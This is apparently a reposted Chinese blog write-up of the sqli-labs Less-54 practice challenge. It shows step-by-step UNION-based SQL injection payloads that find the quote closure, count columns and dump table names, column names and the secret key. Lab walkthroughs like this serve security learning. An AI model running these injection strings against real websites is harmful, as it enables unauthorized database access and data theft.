当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 22:34:00 【华为云】
限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+?id=1')--+?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+ 回显正常?id=1' order by 4--+ 回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
边栏推荐
- 如何减少软件设计和实现之间鸿沟
- 【Yugong Series】July 2022 Go Teaching Course 025-Recursive Function
- Chapter Six
- Talking about the algorithm security of network security
- 利用反射实现一个管理对象信息的简单框架
- Unity-通过预制件和克隆方法动态实现各个UGUI下控件的创建和显示
- Verilog implements a divide-by-9 with a duty cycle of 5/18
- MySQL数据库‘反斜杠\’ ,‘单引号‘’,‘双引号“’,‘null’无法存储
- The old music player WinAmp released version 5.9 RC1: migrated to VS 2019, completely rebuilt, compatible with Win11
- Pytorch lstm time series prediction problem stepping on the pit "recommended collection"
猜你喜欢
Chapter Six
Bika LIMS open source LIMS set - use of SENAITE (detection process)
不知道该怎么办的同步问题
20. Support vector machine - knowledge of mathematical principles
Go1.18 upgrade function - Fuzz test from scratch in Go language
ICML2022 | 深入研究置换敏感的图神经网络
Student management system on the first day: complete login PyQt5 + MySQL5.8 exit the operation logic
Bionic caterpillar robot source code
TestCafeSummary
Collation of knowledge points in Ningbo University NBU IT project management final exam
随机推荐
无状态与有状态的区别
登录业务实现(单点登录+微信扫码+短信服务)
利用反射实现一个管理对象信息的简单框架
「SDOI2016」征途 题解
In Golang go-redis cluster mode, new connections are constantly created, and the problem of decreased efficiency is solved
Efficient Concurrency: A Detailed Explanation of Synchornized's Lock Optimization
Douyin fetches video list based on keywords API
MySQL数据库‘反斜杠\’ ,‘单引号‘’,‘双引号“’,‘null’无法存储
server certificate verification failed. CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none failed
uniapp小程序检查、提示更新
如何导入 Golang 外部包并使用它?
Golang - from entry to abandonment
UserAgent resolution
嵌入式开发没有激情了,正常吗?
数据分析(一)——matplotlib
【论文精读】iNeRF
SQL27 View user details of different age groups
A high-quality WordPress download site template theme developed abroad
Unity-通过预制件和克隆方法动态实现各个UGUI下控件的创建和显示
Redis Overview: Talk to the interviewer all night long about Redis caching, persistence, elimination mechanism, sentinel, and the underlying principles of clusters!...